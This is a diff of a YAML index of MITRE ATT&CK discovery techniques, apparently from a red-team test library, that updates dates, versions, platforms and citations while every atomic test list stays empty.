       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1135:
@@ -49551,12 +50252,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1135
     atomic_tests: []
   T1120:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:41.575Z'
       name: Peripheral Device Discovery
       description: 'Adversaries may attempt to gather information about attached peripheral
         devices and components connected to a computer system.(Citation: Peripheral
@@ -49607,12 +50307,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1120
     atomic_tests: []
   T1082:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:42:22.247Z'
       name: System Information Discovery
       description: |-
         An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49623,7 +50322,6 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Maril Vernon @shewhohacks
       - Praetorian
@@ -49638,7 +50336,6 @@ discovery:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - IaaS
@@ -49686,7 +50383,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1082
     atomic_tests: []
   T1016.002:
@@ -49758,12 +50456,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016.002
     atomic_tests: []
   T1010:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:22:56.372Z'
       name: Application Window Discovery
       description: |-
         Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49805,122 +50502,73 @@ discovery:
       - source_name: Prevailion DarkWatchman 2021
         description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
           new evolution in fileless techniques. Retrieved January 10, 2022.'
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1010
     atomic_tests: []
   T1087.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
-      type: attack-pattern
-      created: '2020-02-21T21:08:33.237Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.003
-        url: https://attack.mitre.org/techniques/T1087/003
-      - source_name: Microsoft Exchange Address Lists
-        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
-        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
-          Retrieved March 26, 2020.
-      - source_name: Microsoft getglobaladdresslist
-        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
-        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
-          2019.
-      - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
-          Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
-        source_name: Black Hills Attacking Exchange MailSniper, 2016
-      - source_name: Google Workspace Global Access List
-        url: https://support.google.com/a/answer/166870?hl=en
-        description: Google. (n.d.). Retrieved March 16, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-17T20:35:35.125Z'
       name: Email Account
       description: |-
         Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
 
-        In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+        In on-premises Exchange and Exchange Online, the <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
 
         In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
         Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1497.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -49935,6 +50583,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -49944,9 +50598,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -49956,102 +50615,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -50105,7 +50799,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -50135,7 +50828,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -50173,12 +50866,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50205,14 +50897,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -50241,7 +50932,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -50301,7 +50991,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -50320,7 +51010,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -50389,12 +51078,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -50471,40 +51159,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
